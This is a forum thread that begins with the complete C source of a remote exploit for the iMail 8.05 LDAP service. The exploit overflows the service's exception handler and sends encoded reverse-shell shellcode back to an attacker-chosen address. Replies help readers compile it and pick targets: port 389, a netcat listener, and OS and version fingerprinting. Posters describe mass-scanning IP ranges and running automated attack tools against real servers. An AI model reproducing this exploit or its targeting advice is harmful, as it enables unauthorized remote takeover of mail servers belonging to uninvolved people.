mortello
/******************************************************************/
/* [Crpt] iMail v8.05 LDAP service remote sploit by kralor [Crpt] */
/******************************************************************/
/* (filtered) iDefense */
/* (filtered) k-otik */
/* (filtered) private exploits */
/* in other words, (filtered) you all security money makers and */
/* private exploits exchangers. */
/* lolo xXx for her patience while these long nights coding */
/* and for errr.. you know what smile.gif */
/******************************************************************/
/* informations: www.coromputer.net,irc undernet #coromputer */
/******************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment (lib,"ws2_32")

// EBP+~0xB6 (ebp+ecx-4) (Structed Exception Handler)
#define SEH_ADDR 0x50FFFFFF

/* for win2k offset:
--- jmp dword ptr [ebx]
*/
#define HIJACKED_2K_EVL 0x0043BD8B // (8.05 eval)
#define HIJACKED_2K_EXP 0x1000F7B0 // (8.05 express)
#define HIJACKED_2K_PRO 0x1000F7A9 // (8.05 pro (not sure smile.gif))

/* for winXP offset:
--- pop esi
--- pop ebx
--- ret
*/

#define HIJACKED_XP_EVL 0x0041F5C7 // (8.05 eval)
#define HIJACKED_XP_EXP 0x100106BC // (8.05 express)
#define HIJACKED_XP_PRO 0x100103CC // (8.05 pro) (not sure smile.gif))

// sequence of 4 opcodes
#define HOP 0xd4 // host opcode
#define POP 0xd7 // port opcode

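/*
 * Open a TCP connection to host:port.
 *
 * host is first resolved with gethostbyname() (on Winsock this also accepts
 * a dotted IPv4 string); inet_addr() is the fallback. On success the
 * connected socket is returned as an int, as the callers expect; on any
 * failure a message is printed, the socket (if one was created) is closed
 * and 0 is returned. WSAStartup() must already have been called.
 *
 * Fixes over the original: socket() signals failure with INVALID_SOCKET,
 * not 0, so `if(!sock)` never fired; the socket leaked on every error path
 * after creation; h_length was copied unchecked into sin_addr; the
 * redundant inet_addr() call before the lookup is gone; connect() failures
 * were all reported as "connection refused".
 */
int cnx(char *host, int port)
{
    SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = {0};
    struct hostent *he;

    /* socket() returns INVALID_SOCKET on failure, never 0 */
    if (s == INVALID_SOCKET) {
        printf("error: unable to create socket (WSA error %d)\r\n", WSAGetLastError());
        return 0;
    }
    sa.sin_family = AF_INET;
    sa.sin_port = htons((u_short)port);

    he = gethostbyname(host);
    if (he != NULL) {
        /* only copy an IPv4 address of exactly the size sin_addr can hold */
        if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof(sa.sin_addr)) {
            printf("error: host did not resolve to an IPv4 address\r\n");
            closesocket(s);
            return 0;
        }
        memcpy(&sa.sin_addr, he->h_addr, sizeof(sa.sin_addr));
    } else {
        sa.sin_addr.s_addr = inet_addr(host);
        if (sa.sin_addr.s_addr == INADDR_NONE) {
            printf("error: cannot resolve host\r\n");
            closesocket(s); /* the original returned here without closing */
            return 0;
        }
    }

    printf("[+] Connecting to %-30s ...", host);
    if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) == SOCKET_ERROR) {
        /* any connect() failure, not only a refusal; report the actual code */
        printf("error: connect() failed (WSA error %d)\r\n", WSAGetLastError());
        closesocket(s);
        return 0;
    }
    printf("Done\r\n");
    return (int)s;
}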

/*
 * Print the tool's title line and the author's contact line to stdout.
 * No format arguments are involved, so plain fputs() is used.
 */
void banner(void)
{
    static const char *const lines[] = {
        "\r\n [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt]\r\n",
        "\t\t www.coromputer.net && undernet #coromputer\r\n\r\n",
    };
    for (size_t k = 0; k < sizeof lines / sizeof lines[0]; k++) {
        fputs(lines[k], stdout);
    }
}

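/*
 * Print the usage text for prog to stdout and terminate the process.
 *
 * Never returns. Exits with EXIT_FAILURE: the original exit(0) reported
 * success for a usage error, and also made the `return -1` that follows
 * every syntax() call in main() unreachable.
 */
void syntax(char *prog)
{
    /* argv[0] may be NULL; printf("%s", NULL) is undefined behaviour */
    const char *name = prog ? prog : "<prog>";
    printf("\r\nsyntax: %s <host> <your_ip> <your_port> <version> [OSver]\r\n\r\n", name);
    printf("<version>\t0\t8.05 professional\r\n");
    printf(" \t1\t8.05 express\r\n");
    printf(" \t2\t8.05 evaluation\r\n---\r\n");
    printf("[OSver] \t0\twindows 2000 universal [default]\r\n");
    printf(" \t1\twindows XP universal\r\n");
    exit(EXIT_FAILURE);
}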



/*
 * Entry point.
 *
 * argv: <host> <your_ip> <your_port> <version> [OSver]; see syntax().
 * Flow: validate the arguments, patch the caller's IP and port over the
 * HOP/POP placeholder runs in shellc0de, build one packet in buffer, send
 * it to <host>:389 through cnx() and return.
 * Exit status: 0 after sending, -1 on any argument/lookup/socket error
 * (usage errors terminate inside syntax(), which calls exit()).
 *
 * NOTE(review): defects visible in this function, left unchanged here:
 *  - isdigit() is called without #include <ctype.h>.
 *  - the placeholder scan runs i up to sizeof(shellc0de)-1 and reads
 *    shellc0de[i+1] (and [i+2], [i+3] when the first two bytes match),
 *    so it can read past the end of the array.
 *  - inet_addr(argv[2]) is not checked for INADDR_NONE.
 *  - `port` is unsigned long, so `port<=0` only rejects 0; a negative
 *    argument wraps to a large value and is caught by the >65535 test
 *    only by accident.
 *  - the stores through (unsigned long*)&buffer[13/17/21] are unaligned
 *    type-punning writes into a char array (UB in ISO C; presumably relied
 *    on working with the 32-bit Windows compilers the thread discusses).
 *  - buffer[] is written only up to index 7026, but sizeof(buffer)-1
 *    == 8094 bytes are sent, so bytes 7027..8093 are indeterminate
 *    (uninitialised stack contents) and are transmitted to the peer.
 *  - strncpy() is used to copy 13 bytes of binary data; it would stop at
 *    a NUL (none occurs in the first 13 bytes of req1, so it happens to
 *    work) — memcpy() is the right call.
 *  - send() reports failure as SOCKET_ERROR, not 0, so the `bytes==0`
 *    test never fires; WSACleanup() is never called.
 */
int main(int argc, char *argv[])
{
int sock,bytes,target,osver=0;
WSADATA wsaData;
/* outgoing packet; see the NOTE(review) above on its uninitialised tail */
char buffer[8095];
/* masked IP and port words that get patched into shellc0de */
unsigned long host,port;
unsigned int i;
/* leading bytes of an LDAP BindRequest (BER TLVs, per the inline comments);
   only req1[0..12] and req1[10..13] are used below */
char req1[] =
"\x30\x82" /* bind request */
"\x0a\x3d" /* bind req len */
/* msg id */
"\x02" /* integer */
"\x01" /* length */
"\x01" /* value */
"\x60" /* bind request */
"\x82" /* msg length 2bytes */
"\x01\x36" /* msg length */
/* LDAP ver */
"\x02" /* integer */
"\xff" /* length */
"\x03" /* value */
"\x05\x00" /* DN NULL */
"\x80\x00"; /* Auth simple */

/* payload bytes, taken verbatim from the original; the HOP/POP runs inside
   it are placeholders replaced by the loop below */
char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */
/* classic xorer */
"\x90"
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
"\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
/* reverse remote shell */
"\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95"
"\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8"
"\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6"
"\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c"
"\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4"
"\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95"
"\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85"
"\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3"
"\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1"
"\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1"
"\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1"
"\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4"
"\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd"
"\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e"
"\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e"
"\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6"
"\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1"
"\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96"
"\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce"
"\x57\x91\x95";

banner();

/* exactly four or five user arguments */
if(argc<5||argc>6)
syntax(argv[0]);

/* listener address, XOR-masked with 0x95959595 before being patched in
   (the result of inet_addr() is not validated) */
host=inet_addr(argv[2])^0x95959595;
port=atoi(argv[3]);

/* <version> must be a single digit 0..2 */
if(!isdigit(argv[4][0])||strlen(argv[4])>1) {
printf("error: <version> must be one digit\r\n");
syntax(argv[0]);
return -1;
}
target=atoi(argv[4]);
if(target<0||target>2) {
printf("error: <version> must be 0, 1 or 2\r\n");
syntax(argv[0]);
return -1;
}
/* optional [OSver]: single digit 0 (win2k, default) or 1 (winXP) */
if(argc==6) {
if(!isdigit(argv[5][0])||strlen(argv[5])>1) {
printf("error: [OSver] must be one digit\r\n");
syntax(argv[0]);
return -1;
}
osver=atoi(argv[5]);
if(osver<0||osver>1) {
printf("error: [OSver] must be 0 or 1\r\n");
syntax(argv[0]);
return -1;
}
}
/* port is unsigned here, so `port<=0` only rejects 0 */
if(port<=0||port>65535) {
printf("error: <port> must be between 1 and 65535\r\n");
syntax(argv[0]);
return -1;
}
/* pack 0x0002 (the value of AF_INET) in the low half and the network-order
   port in the high half of one 32-bit word, then apply the same mask as host */
port=htons((unsigned short)port);
port=port<<16;
port+=0x0002;
port=port^0x95959595;

/* overwrite runs of four HOP bytes with host and runs of four POP bytes
   with port; each value is zeroed once written so the check below can
   tell whether its placeholder was found at all. Reads shellc0de[i+1]
   for every i, including the last index (see NOTE(review) above). */
for(i=0;i<sizeof(shellc0de);i++) {
if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
memcpy(&shellc0de[i],&host,4);
host=0;
}
if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
memcpy(&shellc0de[i],&port,4);
port=0;
}
}

/* a non-zero value means the corresponding placeholder was never found */
if(host||port) {
printf("error: unabled to find ip/port sequence in shellc0de\r\n");
return -1;
}

/* request Winsock 1.1; the matching WSACleanup() is never called */
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}

/* 389 is the LDAP port; cnx() prints its own error on failure */
sock=cnx(argv[1],389);
if(!sock)
return -1;
/* <----- magic packet -----> */
/* buffer layout as written below:
   [0..12]    req1[0..12] (strncpy on binary data; works only because no
              NUL occurs in those 13 bytes)
   [13..7022] 0x90 filler, with SEH_ADDR at 13, the selected HIJACKED_*
              constant at 17 and 0x90909013 at 21 written over it
   [200..]    shellc0de without its NUL terminator
   [7023..7026] req1[10..13]
   [7027..8093] never written, yet included in the send() below */
strncpy(buffer,req1,13);
memset(&buffer[13],0x90,7010);
*(unsigned long*)&buffer[13] = SEH_ADDR;
/* pick the per-OS, per-edition constant for offset 17 */
if(!osver) {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_2K_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_2K_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_2K_EVL;
} else {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_XP_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_XP_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_XP_EVL;
}
*(unsigned long*)&buffer[21] = 0x90909013; // to avoid 0x00 <unwanted instructions> on winXP
memcpy(&buffer[200],shellc0de,sizeof(shellc0de)-1);
memcpy(&buffer[7000+23],&req1[10],4);
printf("[+] Sending magic packet ...");
/* sends sizeof(buffer)-1 == 8094 bytes, more than were initialised */
bytes=send(sock,buffer,sizeof(buffer)-1,0);
printf("Done\r\n");
/* send() returns SOCKET_ERROR (not 0) on failure, so this never triggers */
if(bytes==0) { printf("error: send()\r\n"); }
closesocket(sock);
return 0;
}


/******************************************************************
when compiling, here's the error I get... can someone please tell me what's wrong smile.gif

Wedit output window build: Thu Feb 19 11:19:09 2004
Error c:\lcc\projects\gso\robot.c 53 undefined reference to _socket@12
Error c:\lcc\projects\gso\robot.c 59 undefined reference to _inet_addr@4
Error c:\lcc\projects\gso\robot.c 60 undefined reference to _htons@4
Error c:\lcc\projects\gso\robot.c 62 undefined reference to _gethostbyname@4
Error c:\lcc\projects\gso\robot.c 71 undefined reference to _connect@12
Error c:\lcc\projects\gso\robot.c 210 undefined reference to _WSAStartup@8
Error c:\lcc\projects\gso\robot.c 241 undefined reference to _send@16
Error c:\lcc\projects\gso\robot.c 244 undefined reference to _closesocket@4
Compilation + link time:1.2 sec, Return code: 11

thanks
fre4k
w0rks fine to compile with m$ 6.0 ! biggrin.gif

anybody knows which port to scan?

in the source code I found:

port: 26 ?!?

-fre4k


edit//

I have scan for port: 26 and it works.... I can connect

[+] Connecting to 212.100.*.* ...Done
[+] Sending magic packet ...Done


but n0 shell, i go on.... biggrin.gif


violator13
hi,
i always do it this way when coding with socks:

CODE

...
/* informations: www.coromputer.net,irc undernet #coromputer */
/******************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock2.h>

#ifdef _MSC_VER
#pragma comment (lib,"ws2_32")
#endif

// EBP+~0xB6 (ebp+ecx-4) (Structed Exception Handler)
#define SEH_ADDR 0x50FFFFFF
...


just included winsock2.h instead of winsock.h and put a condition for MS VC++ in.
So it compiles fine with bcc32 AND ms vc++. This should probably work with lcc smile.gif

greetings

violator
Planquadrat
i've compiled it without any problems with VS++
QUOTE

--------------------Konfiguration: ldaped - Win32 Debug--------------------
Linker-Vorgang läuft...

ldaped.exe - 0 Fehler, 0 Warnung(en)


#pragma comment (lib,"ws2_32") <-- is for use with MS Visual and not with LCC

but ...
...Error c:\lcc\projects\gso\robot.c <-- this is not the same source as you've posted
mortello
QUOTE (violator13 @ Feb 19 2004, 04:32 PM)
hi,
i always do it this way when coding with socks:

CODE

...
/* informations: www.coromputer.net,irc undernet #coromputer */
/******************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock2.h>

#ifdef _MSC_VER
#pragma comment (lib,"ws2_32")
#endif

// EBP+~0xB6 (ebp+ecx-4) (Structed Exception Handler)
#define SEH_ADDR 0x50FFFFFF
...


just included winsock2.h instead of winsock.h and put a condition for MS VC++ in.
So it compiles fine with bcc32 AND ms vc++. This should probably work with lcc smile.gif

greetings

violator

Didn't do it sad.gif
mortello
QUOTE (Planquadrat @ Feb 19 2004, 04:34 PM)
i've compiled it without any problems with VS++
QUOTE

--------------------Konfiguration: ldaped - Win32 Debug--------------------
Linker-Vorgang läuft...

ldaped.exe - 0 Fehler, 0 Warnung(en)


#pragma comment (lib,"ws2_32") <-- is for use with MS Visual and not with LCC

but ...
...Error c:\lcc\projects\gso\robot.c <-- this is not the same source as you've posted

Tried without pragma...didn't help....

I also changed the name of the code...(because I had copy pasted into the robot.c)

still at the same problem....using lcc
studnikov
ill post the exe in the file section.
Steffan
QUOTE (fre4k @ Feb 19 2004, 04:27 PM)
anybody knows which port to scan?
in the source code I found:
port: 26 ?!?

*LOLLLLLLLLLLLLLLLL* Please !!! Just study the code a little bit and it's functions !!

Damn can't be sooooo hard to get the right port or use netstat and U'll see it too !!! rolleyes.gif
funktion U have to check -> cnx !!!

more I don't like to help U cause this question is too stu.... mad.gif

Damn scann the (filtered) net but have no idea about sourcecodes... unsure.gif

Have a nice day SK !!

ph34r.gif
DiJiTooL
Big thanks to Kralor and the Coromputer team
i've compiled the source code with VC++
imail.exe (155ko)

(studnikov you must scan port 389)
poerkel
Anybody with problems compiling, try:

#include <ctype.h>

Should help wink.gif
Raedemer
Sounds cool, again a cool exploit from kralor smile.gif

I've compiled successfully, but when I try some ranges I don't get any shell.
unn4m3d
anybody got a shell yet?
thx for the compiled one!
I dont get a shell and you??
Divx_dude
many thanks to kralor wink.gif there good these moments wink.gif keep that up!!!
bli4
thx kralor , unn4m3d no shell for the moment its strange blink.gif
JaX
wink.gif nice m8te thx for the compilation
Steffan
For all who have problems using LCC to compile it ..
check the makefile generated by LCC !!
add the following lib and it works fine wink.gif

LIBS=wsock32.lib
EXE="xxx.exe"

that's all .. usually LCC asks U to import the missing libs but sometimes it's buggy huh.gif

C'ya
Steven
jeroen
also no shell yet.

I was just thinking, maybe it's more clever to scan on port 8383. I saw in google imail servers running on that port. Just gonna give that a try.
DiJiTooL
this sploit works great but you must know
the OSver and imail ver
someone know how get the imail version?
the banner doesn't give the version... sad.gif
SirSmokealot
sploit works really great for me tongue.gif ...... thx a lot!
mortello
QUOTE (SirSmokealot @ Feb 19 2004, 07:26 PM)
sploit works really great for me tongue.gif ...... thx a lot!

Do you get many shells ?

If yes do you open a NC.exe or do you wait for stuff to pop in the mail.exe window ?
Jipsu
QUOTE (jeroen @ Feb 19 2004, 07:17 PM)
I was just thinking, maybe it's more clever to scan on port 8383. I saw in google imail servers running on that port. Just gonna give that a try.

I think that's just a web administration port..

389 is the LDAP port smile.gif
DiJiTooL
i've tested it on my local imail server and it works
you must run netcat with <-lvp port> argument
mortello
QUOTE (DiJiTooL @ Feb 19 2004, 07:33 PM)
i've tested it on my local imail server and it works
you must run netcat with <-lvp port> argument

That's what I do and didn't work on a few range

oh well, will test more
caze
sounds very interesting; does anyone know a good scanner which shows me both the OS version and the LDAP version?

solong
Sick-Boy
I also Scanned port 389 ..... got a few results but same with all of them

[+] Connecting to *.*.*.* ...Done
[+] Sending magic packet ...Done

C:\>


no Shell sad.gif
iFan
soo I dont know too which port is to scan biggrin.gif pls find it out...
caze
QUOTE (iFan @ Feb 19 2004, 07:50 PM)
soo I dont know too which port is to scan biggrin.gif pls find it out...

have you read all the posts?! omg
mortello
QUOTE (iFan @ Feb 19 2004, 07:50 PM)
soo I dont know too which port is to scan biggrin.gif pls find it out...

Yeah, could you bother to read at least before posting your questions....
Leonnetje
dry.gif

No Shells here... using NetCat "-l -vv -p PORT" but can't figure out what version and OSver to choose....

Got some results from P389 scans, but no shells...

Anybody with good results who would be so kind to explain a little more (for example HOW to check the scans for vuln's ??)
mortello
QUOTE (Steffan @ Feb 19 2004, 07:12 PM)
For all who have problems using LCC to compile it ..
check the makefile generated by LCC !!
add the following lib and it works fine wink.gif

LIBS=wsock32.lib
EXE="xxx.exe"

that's all .. usually LCC asks U to import the missing libs but sometimes it's buggy huh.gif

C'ya
Steven

Nice, it worked

thanks dude smile.gif
night^man
checked alot of ip'z and no shell..
karlor thx any way
ako
same here checked quite a lot and nothing thanks anyhow
wizy
Anyone have a working linux version of this yet? (I dont have windows on any systems I actually use.)
Sedolf
also no results for me
tried like 300 ips; no shell
Alien
QUOTE (DiJiTooL @ Feb 19 2004, 07:33 PM)
i've tested it on my local imail server and it works
you must run netcat with <-lvp port> argument

Please check your server with scanline [sl.exe -bhpt 389 -f scan.txt -o vulnerable.txt] and post your results smile.gif
DiJiTooL
QUOTE (Alien @ Feb 19 2004, 10:57 PM)
QUOTE (DiJiTooL @ Feb 19 2004, 07:33 PM)
i've tested it on my local imail server and it works
you must run netcat with <-lvp port> argument

Please check your server with scanline [sl.exe -bhpt 389 -f scan.txt -o vulnerable.txt] and post your results smile.gif

-------------------------------------------------------------------------------
127.0.0.1
Responds with ICMP unreachable: No
TCP ports: 389


TCP 389:
[0 a]

-------------------------------------------------------------------------------

i have a shell on my local machine and on a friend machine but not on a scanned machine sad.gif
using WINXP on two machine
maybe a problem with win2k machine?? blink.gif
bye
TheOther
I also tried a lot of checked Imail ips. Netcat didn't return any shell.

In the source code is written:
#define HIJACKED_2K_PRO 0x1000F7A9 // (8.05 pro (not sure smile.gif))
Has anyone tested whether 0x1000F7A9 is correct?

I see many autohaxors in private.
Sedolf
Ok already posted this @coromputer here is it again:
ok guys got the problem
listen up: As soon as you exploit this server ONCE no matter if you put in xp, 2k or eval/pro bla bla the ldap server stops AFTER exploitation!
So if you once exploit an ip with the wrong os/version settings it will not work again until the service is restarted/computer rebooted!
you need to know which os and which version you exploit or else you can forget it..
only had this problem on my local machine so far
cyrixx
ohh, thx sedolf! i have used an autohaxxor and wondering why i didn't get a shell...
AlexeyG
But you can't find out what version and OS the remote pc uses, so it is luck to get a shell...?
thesensor
Thank u all smile.gif
Trying ... if I have succes i will post here .. thank again
ilnctm
thanx mates
gonna test it out wink.gif
Pro21
no shell arrive and i tried to check the imail version but nothing tools work :/
Steffan
QUOTE (AlexeyG @ Feb 20 2004, 05:39 AM)
But you can't find out wht version and os the remote pc uses, so it is luck to get a shell...?

No it's not true !!

I'm working on a scan checker that will give U the OS type and iMail version...
If U wana check use GFI Lanscann and there U will see OS-Type and Version wink.gif

but scanning only port 389 isn't good cause there are also Exchange and Unix systems using the LDAP port !! wink.gif

So a scann checker will be needed to get a shell for sure wink.gif

C'ya
Steven
jos40
Seems a good idea to get a scanner who reads the OS.
Gonna try that for sure.
Thnx for the info.
biggrin.gif
Sedolf
port 389 = standard LDAP for SMTP
if you banner check your port 389 scans with scanline on port 25 you can see which smtp server is running there.
if you get verrrrry lucky and imail is there (very few imail out there) then you HAVE to find out Os and version or else it crashes after first exploitation (you maybe have a chance before because it crashes like ~3 secs after exploit) so if you know os and hack very fast version 0, 1, 2 with autohacker you could get a shell maybe smile.gif
if it was version 8.05 (newest) you will 100% get a shell.
I could also imagine doing a banner scan on port 25 for *imail* with dsns
Meteor
i will try it too, great sploit and great work from kralor!
barty32
@Sedolf

thx for this great information
Dinos
Very good work, thanks for sharing such a tool with us smile.gif
DiJiTooL
hum we need check LDAP on port 389 and Imail on port 25
thanks for all informations